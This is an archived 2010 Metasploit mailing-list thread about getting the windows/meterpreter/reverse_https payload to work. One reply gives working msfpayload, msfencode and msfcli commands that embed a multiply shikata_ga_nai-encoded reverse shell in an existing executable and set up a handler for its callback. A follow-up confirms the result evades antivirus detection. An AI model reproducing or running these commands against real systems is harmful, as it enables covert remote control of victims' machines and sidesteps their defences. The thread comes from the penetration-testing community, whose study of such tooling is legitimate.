[prev in list] [next in list] [prev in thread] [next in thread]
List: metasploit-framework
Subject: Re: [framework] windows/meterpreter/reverse_https still working
From: wfdawson <wfdawson () bellsouth ! net>
Date: 2010-11-16 21:24:17
Message-ID: 935134.43210.qm () web180409 ! mail ! gq1 ! yahoo ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
With the exception of "payload=shikata_ga_nai" mention on the msfcli line, I was
happy to see that not only do the below steps avoid any detection by my AV, but
it is also substantially faster to load than the equivalent multi-staged
Meterpreter payload.
Thanks for the tip!
________________________________
From: Marc Doudiet <marc.doudiet@gmail.com>
To: framework@spool.metasploit.com
Sent: Tue, November 16, 2010 3:54:20 PM
Subject: Re: [framework] windows/meterpreter/reverse_https still working
Hi,
I just used it today and it worked like a charm:
./msfpayload windows/meterpreter/reverse_https LHOST=xx.xx.xx.xx LPORT=443 R |
./msfencode -t exe -x test.exe -o test.exe -e x86/shikata_ga_nai -c 5
./msfcli exploit/multi/handler payload=shikata_ga_nai lhost=xx.xx.xx.xx
lport=443 payload=windows/meterpreter/reverse_https E
hope this help.
M
On Nov 16, 2010, at 4:31 PM, Miguel Rios wrote:
I've also had issues lately with windows/meterpreter/reverse_https where it
seems to start the connection and then hangs with no error messages. Regular old
reverse_http works without a hitch and obviously 443 is allowed through the
firewall so I think it may be a problem with meterpreter itself. I'd appreciate
it if others could give feedback if they're seeing the same issues with latest
svned up metasploit before I spend an afternoon testing it further.
>
>Thanks
>
>--- On Sat, 10/30/10, Jeffs <jeffs@speakeasy.net> wrote:
>
>
>>From: Jeffs <jeffs@speakeasy.net>
>>Subject: [framework] windows/meterpreter/reverse_https still working
>>To: "framework@spool.metasploit.com" <framework@spool.metasploit.com>
>>Date: Saturday, October 30, 2010, 12:42 PM
>>
>>
>>Hello All,
>>
>>Does the windows/meterpreter/reverse_https still work in this day and age?
>>I am having difficulty getting it to connect back to a IE 7 instance using
>>the example here:
>>http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html
>>
>>I see through tcpdump that the connection is being requested but nothing
>>happens in the exploit/multi/handler.
>>
>>Also, I cannot get the msfencode to work. Receive message no such file or
>>directory "msfencode" even though I see it in plain sight.
>>
>>Thank you.
>>
>>
>>-----Inline Attachment Follows-----
>>
>>
>>_______________________________________________
>>https://mail.metasploit.com/mailman/listinfo/framework
>>
>_______________________________________________
>https://mail.metasploit.com/mailman/listinfo/framework
>
[Attachment #5 (text/html)]
<html><head><style type="text/css"><!-- DIV {margin:0px;} \
--></style></head><body><div style="font-family:times new roman,new \
york,times,serif;font-size:12pt"><div>With the exception of "payload=shikata_ga_nai" \
mention on the msfcli line, I was happy to see that not only do the below steps avoid \
any detection by my AV, but it is also substantially faster to load than the \
equivalent multi-staged Meterpreter payload.<br><br>Thanks for the tip!<br></div><div \
style="font-family: times new roman,new york,times,serif; font-size: 12pt;"><br><div \
style="font-family: times new roman,new york,times,serif; font-size: 12pt;"><font \
size="2" face="Tahoma"><hr size="1"><b><span style="font-weight: \
bold;">From:</span></b> Marc Doudiet <marc.doudiet@gmail.com><br><b><span \
style="font-weight: bold;">To:</span></b> framework@spool.metasploit.com<br><b><span \
style="font-weight: bold;">Sent:</span></b> Tue, November 16, 2010 3:54:20 \
PM<br><b><span style="font-weight: bold;">Subject:</span></b> Re: [framework] \
windows/meterpreter/reverse_https still working<br></font><br> \
Hi,<div><br></div><div>I just used it today and it worked like a \
charm:</div><div><br></div><div><div>./msfpayload windows/meterpreter/reverse_https \
LHOST=xx.xx.xx.xx LPORT=443 R | ./msfencode -t exe -x test.exe -o test.exe -e \
x86/shikata_ga_nai -c 5</div><div><br></div><div><div>./msfcli exploit/multi/handler \
payload=shikata_ga_nai lhost=xx.xx.xx.xx lport=443 \
payload=windows/meterpreter/reverse_https E</div></div><div><br></div><div>hope this \
help.</div><div><br></div><div>M</div><div><br></div><div><div>On Nov 16, 2010, at \
4:31 PM, Miguel Rios wrote:</div><br class="Apple-interchange-newline"><blockquote \
type="cite"><table cellpadding="0" cellspacing="0" border="0"><tbody><tr><td \
style="font: inherit;" valign="top">I've also had issues lately with \
windows/meterpreter/reverse_https where it seems to start the connection and then \
hangs with no error messages. Regular old reverse_http works without a hitch and \
obviously 443 is allowed through the firewall so I think it may be a problem with \
meterpreter itself. I'd appreciate it if others could give feedback if they're seeing \
the same issues with latest svned up metasploit before I spend an afternoon testing \
it further.<br><br>Thanks<br><br>--- On <b>Sat, 10/30/10, Jeffs <i><<a \
rel="nofollow" ymailto="mailto:jeffs@speakeasy.net" target="_blank" \
href="mailto:jeffs@speakeasy.net">jeffs@speakeasy.net</a>></i></b> \
wrote:<br><blockquote style="border-left: 2px solid rgb(16, 16, 255); margin-left: \
5px; padding-left: 5px;"><br>From: Jeffs <<a rel="nofollow" \
ymailto="mailto:jeffs@speakeasy.net" target="_blank" \
href="mailto:jeffs@speakeasy.net">jeffs@speakeasy.net</a>><br>Subject: [framework] \
windows/meterpreter/reverse_https still working<br>To: "<a rel="nofollow" \
ymailto="mailto:framework@spool.metasploit.com" target="_blank" \
href="mailto:framework@spool.metasploit.com">framework@spool.metasploit.com</a>" \
<<a rel="nofollow" ymailto="mailto:framework@spool.metasploit.com" \
target="_blank" href="mailto:framework@spool.metasploit.com">framework@spool.metasploit.com</a>><br>Date: \
Saturday, October 30, 2010, 12:42 PM<br><br><div id="yiv1602772353">
<font face="Helvetica, Arial, sans-serif">Hello All,<br>
<br>
Does the windows/meterpreter/reverse_https still work in this day
and age? I am having difficulty getting it to connect back to a IE
7 instance using<br>
the example here:<br>
</font><font face="Helvetica, Arial, sans-serif"><span><a target="_blank" \
href="http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html">htt \
p://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html</a></span></font><br>
<br>
<font face="Helvetica, Arial, sans-serif">I see through tcpdump that
the connection is being requested but nothing happens in the
exploit/multi/handler.<br>
<br>
Also, I cannot get the msfencode to work. Receive message no such
file or directory "msfencode" even though I see it in plain sight.<br>
<br>
Thank you.<br>
</font><br>
</div><br>-----Inline Attachment Follows-----<br><br><div \
class="plainMail">_______________________________________________<br><a \
rel="nofollow" target="_blank" \
href="https://mail.metasploit.com/mailman/listinfo/framework">https://mail.metasploit. \
com/mailman/listinfo/framework</a><br></div></blockquote></td></tr></tbody></table><br>
_______________________________________________<br><a rel="nofollow" \
target="_blank" href="https://mail.metasploit.com/mailman/listinfo/framework">https:// \
mail.metasploit.com/mailman/listinfo/framework</a><br></blockquote></div><br></div></div></div>
</div></body></html>
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic